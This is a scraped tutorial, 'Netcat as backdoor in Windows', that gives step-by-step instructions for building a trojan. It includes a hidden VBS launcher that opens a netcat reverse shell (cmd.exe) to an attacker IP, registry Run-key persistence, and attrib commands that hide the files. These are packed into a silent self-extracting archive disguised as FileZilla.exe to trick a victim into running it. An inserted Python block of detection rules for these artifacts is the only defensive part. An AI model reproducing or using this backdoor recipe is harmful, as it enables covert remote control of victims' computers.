netcat by knight crawler

Post on 09-Apr-2018


8/8/2019 Netcat by Knight Crawler

http://slidepdf.com/reader/full/netcat-by-knight-crawler 1/9

 

Netcat as backdoor in Microsoft Windows

by

KnightCrawler

Thankx to Auditorsec and Ne011

for their time and support


1  Netcat as backdoor in Windows| KnightCrawler

Objective:

To use Netcat as a backdoor in Microsoft Windows.

Tools required:

Netcat

Download link: http://securityoverride.com/infusions/pro_download_panel/download.php?did=10 

Resource Hacker

Download link: http://en.kioskea.net/download/download-1536-reshack 

WinRAR

Download Link: http://www.rarlab.com/download.htm 

Note:

For this purpose I'm using a bridged VirtualBox. You can try it there or in a real network.

I'm using Windows XP Professional SP2.

Attacking machine:

Name: xp-attacker

Internal IP: 192.168.1.2

Victim machine:

Name: xp-victim

Internal IP: 192.168.1.3

DO NOT USE IT FOR DESTRUCTION PURPOSE BECAUSE WE ARE HERE TO LEARN.

THE AUTHOR TAKES NO RESPONSIBILITY OF ANY DAMAGE TO ANYONE OR ANYTHING.


Step 1:

Download the files and save them in the attacking machine.

Step 2:

Open notepad and make a .vbs file that will run our Netcat when the victim powers on his computer.

Save this file as anyname.vbs 

I have saved this file as file.vbs

Contents of the vbs file:

Const HIDDEN_WINDOW = 1

strComputer = "."

Set objStartup = GetObject("winmgmts:" _

& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_ProcessStartup")

Set objProcess = GetObject("winmgmts:" _

& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_Process")

Set objConfig = objStartup.SpawnInstance_

objConfig.ShowWindow = HIDDEN_WINDOW

errReturn = objProcess.Create("C:\windows\system32\nc.exe -d -e cmd.exe 192.168.1.2 4444", null,

objConfig, intProcessID)

C:\windows\system32\ - Path where the netcat file (nc.exe) is present and is to be run.

192.168.1.2 - Internal IP address of the attacker.

4444 - Open port on the attacker.

Step 3:

Now add a value in the Windows registry so that file.vbs runs every time the system boots up.

For this, open Notepad and make a .cmd file that will add the required value to the registry.

Save this file as anyname.cmd

I have saved this file as addreg.cmd


Contents of the cmd file:

reg add HKLM\software\microsoft\windows\currentversion\run /f /v nc /d

C:\windows\system32\file.vbs

HKLM\software\microsoft\windows\currentversion\run - Location in the registry

/f - Forces the entry to be added to the registry

/v nc - Sets the name of the entry

/d C:\windows\system32\file.vbs - Sets the value of the entry

Step 4:

Now we create another .cmd file to run: nc.exe, file.vbs, addreg.cmd

And also to set the file attributes.

For this open notepad and make a .cmd file.

Save this file as anyname.cmd

I have saved this file as run.cmd

Contents of the cmd file:

attrib +s +h C:\windows\system32\nc.exe

attrib +s +h C:\windows \system32\file.vbs

attrib +s +h C:\windows \system32\addreg.cmd

attrib +s +h C:\windows \system32\run.cmd

file.vbs

addreg.cmd

attrib - Sets file attributes

+s - Marks the file as a system file

+h - Marks the file as hidden

C:\windows\system32\ - Location of the files

file.vbs - Run this file

addreg.cmd - Run this file
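
Each of Steps 2 to 4 leaves a distinct artifact on the host that a defender can match on: a netcat process started with -e, a Run-key value that points at a script file, and attrib +s +h applied under system32. The following is an added detection example, not part of the original document; the rule names, the host xp-admin and all sample command lines are constructed for illustration.

```python
import re

# Added example: rule names and sample events are constructed for illustration.
RUN_KEY = (r"(?:HKLM|HKCU|HKEY_LOCAL_MACHINE|HKEY_CURRENT_USER)"
           r"\\software\\microsoft\\windows\\currentversion\\run(?:once)?")
RULES = [
    # Step 2: netcat started with -e <program> hands a shell to a remote peer.
    ("netcat_exec", re.compile(
        r'(?:^|[\\/\s"])(?:nc|ncat|netcat)(?:\.exe)?"?\s+(?:.*\s)?-[a-z]*e[a-z]*\s+\S', re.I)),
    # Step 3: a Run-key value whose data is a script file rather than an executable.
    ("run_key_script", re.compile(
        r'\breg(?:\.exe)?\s+add\s+"?' + RUN_KEY + r'\b.*\.(?:vbs|vbe|js|jse|wsf|cmd|bat)\b', re.I)),
    # Step 4: system + hidden attributes set on a file under system32.
    ("attrib_hide_system32", re.compile(
        r'\battrib(?:\.exe)?\s+(?=.*\+s\b)(?=.*\+h\b).*\\windows\\system32\\\S+', re.I)),
]

SAMPLE_EVENTS = [  # (host, process command line), constructed sample data
    ("xp-victim", r"C:\windows\system32\nc.exe -d -e cmd.exe 192.168.1.2 4444"),
    ("xp-victim", r"reg add HKLM\software\microsoft\windows\currentversion\run"
                  r" /f /v nc /d C:\windows\system32\file.vbs"),
    ("xp-victim", r"attrib +s +h C:\windows\system32\nc.exe"),
    # Benign look-alikes that must not fire:
    ("xp-admin", r"nc.exe -z -v 192.168.1.10 80"),
    ("xp-admin", r"reg add HKLM\software\microsoft\windows\currentversion\run"
                 r' /v Updater /d "C:\Program Files\Vendor\updater.exe"'),
    ("xp-admin", r"attrib +h C:\Users\alice\notes.txt"),
]

def detect(cmdline):
    """Return the names of all rules matching one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(events):
    """Return (host, rule) for every rule hit in a list of (host, cmdline)."""
    return [(host, rule) for host, cmd in events for rule in detect(cmd)]

def full_chain_hosts(hits):
    """Hosts where all three behaviours were seen, i.e. the whole chain."""
    seen = {}
    for host, rule in hits:
        seen.setdefault(host, set()).add(rule)
    return sorted(h for h, rules in seen.items() if len(rules) == len(RULES))

if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for host, rule in hits:
        print(host, rule)
    print("full chain on:", full_chain_hosts(hits))
```

On a monitored host the command lines would come from process-creation logging, for example Windows event ID 4688 with command-line auditing or Sysmon event ID 1.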

Step 5:

Now we have to create our final file that will be run on the victim’s computer.

For this add all the files:

nc.exe, file.vbs, addreg.cmd, run.cmd

to the archive as shown below

Save this file as anyname.exe

Select Create SFX archive and Lock archive

I'm using the name FileZilla.exe because I will be using its icon later on.

Now select SFX options from the Advanced tab.

Now set Path to extract and Run after extraction in the General tab.

Set the Silent mode to Hide all in the Modes tab.

Set Update mode to Extract and replace files and Overwrite mode to Overwrite all files in Update tab.

Press Ok twice and you will have your file FileZilla.exe

Step 6:

Now we have to change its icon to attract the victim to open it.

For this we use Resource Hacker.

Open resource hacker and then open your file FileZilla.exe

Select icon group and there select the value, right-click on it and click Replace resource

Now click Open file with new icon. Then select the icon of your choice and click Replace.

Now we have replaced the icon.

Save the file with a new name. I choose FileZilla.exe only and replaced the old file with it.

Step 7:

Send this file FileZilla.exe to the victim.

Open netcat and run the following command.

Nc –Lvp 444

Step 8:

When the file FileZilla.exe is executed in the victim’s computer then the attacker will get remote control of the victim’s computer.

The attacker’s screen will look something like this:

Step 9:

And you are done☺

It is requested that you play safe and don’t create havoc with this.